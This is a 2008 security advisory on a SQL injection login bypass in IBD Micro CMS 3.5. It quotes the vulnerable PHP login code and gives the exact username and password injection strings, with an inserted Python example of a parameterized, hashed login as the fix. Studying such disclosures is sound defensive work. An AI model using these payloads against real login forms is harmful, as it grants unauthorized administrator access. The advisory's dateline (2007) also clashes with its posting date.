ibdmicro-sql.txt

Posted May 12, 2008
Authored by SkyOut | Site wired-security.net

IBD Micro CMS version 3.5 suffers from a SQL injection vulnerability that allows for login bypass.

tags | exploit, sql injection
SHA-256 | cfbea5975b0f3902084d53815c48fa3761e03ca51827c310c1c1e8c3f3a879c5

____________________________________________________________________________
____________________________________________________________________________

01010111 01001001 01010010 01000101 01000100 01010011 ->
01000101 01000011 01010101 01010010 01001001 01010100 ->
01011001

____________________________________________________________________________
ADVISORY: IBD MICRO CMS 3.5 SQL INJECTION (LOGIN BYPASS)
____________________________________________________________________________

_____________________
|| 0x00: ABOUT ME
|| 0x01: DATELINE
|| 0x02: INFORMATION
|| 0x03: EXPLOITATION
|| 0x04: RISK LEVEL

____________________________________________________________
____________________________________________________________

_________________
|| 0x00: ABOUT ME

Author: SkyOut
Date: May 2008
Website: http://wired-security.net/

_________________
|| 0x01: DATELINE

2007-05-09: Bug found
2007-05-10: Advisory released

____________________
|| 0x02: INFORMATION

The content management system Micro CMS in version 3.5, and possibly lower versions,
suffers from a SQL injection bug that makes it possible to log into the admin
interface without knowing the credentials.

First off, where can you find the tool:
http://www.impliedbydesign.com/ibd-micro-cms-static-content-manager.html

Direct download:
http://www.impliedbydesign.com/files/software_downloads/microcms/microcms.zip

They have taken down their demo site because of security issues. It seems they
realized that there are some bugs, but instead of fixing them they just keep the tool
online and free for download!

To make this bug exploitable, "magic_quotes_gpc" has to be turned "Off", since the
payload below relies on double quotes reaching the query unescaped!

So let's look at the bug now...

_____________________
|| 0x03: EXPLOITATION

When you download the file microcms.zip and extract it, you have the following things in your
directory:

Folder: micro_cms_files, microcms_subdirectory_example
Files: microcms-admin-home.php, microcms-admin-login.php, microcms-index.php

Let's look into the microcms-admin-login.php file:

--- SNIP ---
if ($_POST['action'] == 'admin_login') {
    $i = 0;
    if (!$_POST['administrators_username']) {
        $error[$i] = "Please enter your username.";
        $i++;
    }
    if (!$_POST['administrators_pass']) {
        $error[$i] = "Please enter a password.";
        $i++;
    }
    if ($i == 0) {
--- SNIP ---

Via the variable $i the tool checks whether both username and password have been
set; if so, an if-clause is entered and here we go:

--- SNIP ---
    if ($i == 0) {
        $sql = '
        SELECT *
        FROM microcms_administrators
        WHERE administrators_username = "' . $_POST['administrators_username'] . '" and
        administrators_pass = PASSWORD("' . $_POST['administrators_pass'] . '")';
        $user_result = mysql_query($sql);

        if (mysql_num_rows($user_result) < 1) {
            $error[$i] = "That username and password don't match, please try again.";
            $i++;
        } else {
--- SNIP ---

Here we have the SQL injection. The query is built by concatenating the raw POST values into
the variable $sql and finally executed via mysql_query($sql); the result is saved in $user_result.
If the number of returned rows is less than 1 an error has occurred, if not...

So what do we have to set for username (administrators_username) and password (administrators_pass)?

Username is simple: just input " or "1" = "1 ... this makes the username part of the query always
true. The password is a bit more tricky because of the PASSWORD() function wrapping the value.
Password will then be this: ") or "1" = "1" or PASSWORD("

All in all we have:

--- SNIP ---
$sql = '
SELECT *
FROM microcms_administrators
WHERE administrators_username = "" OR "1" = "1" and
administrators_pass = PASSWORD("") or "1" = "1" or PASSWORD("")';
--- SNIP ---

And finally we execute this and get the following:

--- SNIP ---
$admin = mysql_fetch_array($user_result);
$_SESSION['microcms_admin_username'] = $admin['administrators_username'];
$_SESSION['microcms_admin_password'] = $admin['administrators_pass'];
$_SESSION['microcms_admin_email'] = $admin['administrators_email'];
$_SESSION['microcms_admin_id'] = $admin['administrators_id'];
$_SESSION['microcms_admin_level'] = $admin['administrators_level'];
header("Location:microcms-admin-home.php");
$main_content = '<h2>You have successfully logged in!</h2><p>You may now navigate to the page whose content you would like to change.</p>';
--- SNIP ---

Alright, we are logged in! Hacked!
Do whatever you want now...
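For contrast, here is what the login check looks like when the query is parameterized and the password is hashed in application code. This is an added example written for this page; it is not code from the advisory or from IBD Micro CMS. It uses Python's sqlite3 and hashlib as offline stand-ins for the PHP mysql_* API and MySQL's PASSWORD(); the table and column names are taken from the advisory, while the sample administrator row, its salt and the extra administrators_salt column are constructed. The two injection strings from the advisory are fed in as ordinary input to show that, once bound as parameters, they are just data and the magic_quotes_gpc setting no longer matters.

```python
"""Hardened admin login: parameterized lookup plus salted, slow password hashing.

Added example (not from the advisory or from IBD Micro CMS). sqlite3 stands in
for MySQL, PBKDF2 stands in for MySQL's unsalted PASSWORD(). The sample account,
salt and the administrators_salt column are constructed for this demo.
"""
import hashlib
import hmac
import os
import sqlite3

PBKDF2_ROUNDS = 100_000  # deliberately slow; tune for the deployment


def hash_password(password: str, salt: bytes) -> bytes:
    """Salted, iterated hash instead of a single unsalted PASSWORD() call."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)


def setup_db() -> sqlite3.Connection:
    """Create the (constructed) administrators table with one sample account."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        """
        CREATE TABLE microcms_administrators (
            administrators_id INTEGER PRIMARY KEY,
            administrators_username TEXT NOT NULL UNIQUE,
            administrators_salt BLOB NOT NULL,
            administrators_pass BLOB NOT NULL,
            administrators_level INTEGER NOT NULL
        )
        """
    )
    salt = os.urandom(16)
    conn.execute(
        "INSERT INTO microcms_administrators "
        "(administrators_username, administrators_salt, administrators_pass, administrators_level) "
        "VALUES (?, ?, ?, ?)",
        ("admin", salt, hash_password("correct horse", salt), 1),  # constructed sample account
    )
    conn.commit()
    return conn


def login(conn: sqlite3.Connection, username: str, password: str):
    """Return {'id', 'level'} for a valid username/password pair, else None.

    The query selects on the username only, bound with '?', so quote characters
    in either field cannot alter the SQL. The password is verified in code with
    a constant-time comparison, never inside the WHERE clause.
    """
    if not username or not password:
        return None
    row = conn.execute(
        "SELECT administrators_id, administrators_salt, administrators_pass, administrators_level "
        "FROM microcms_administrators WHERE administrators_username = ?",
        (username,),
    ).fetchone()
    if row is None:
        # Hash anyway so unknown and known usernames take similar time.
        hash_password(password, b"\x00" * 16)
        return None
    admin_id, salt, stored, level = row
    if not hmac.compare_digest(stored, hash_password(password, salt)):
        return None
    return {"id": admin_id, "level": level}


# The two inputs from the advisory, used here only to show they are inert as data.
INJECTED_USERNAME = '" or "1" = "1'
INJECTED_PASSWORD = '") or "1" = "1" or PASSWORD("'

if __name__ == "__main__":
    db = setup_db()
    print("valid credentials:", login(db, "admin", "correct horse"))
    print("advisory payload :", login(db, INJECTED_USERNAME, INJECTED_PASSWORD))
```

The equivalent fix in the PHP code would be a prepared statement (mysqli or PDO with bound parameters) and a proper password hash in place of PASSWORD(); escaping alone, whether by magic_quotes_gpc or by hand, is what the advisory shows to be fragile.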

___________________
|| 0x04: RISK LEVEL

- HIGH - (3/3) -

<!> Happy Hacking <!>

____________________________________________________________________________
____________________________________________________________________________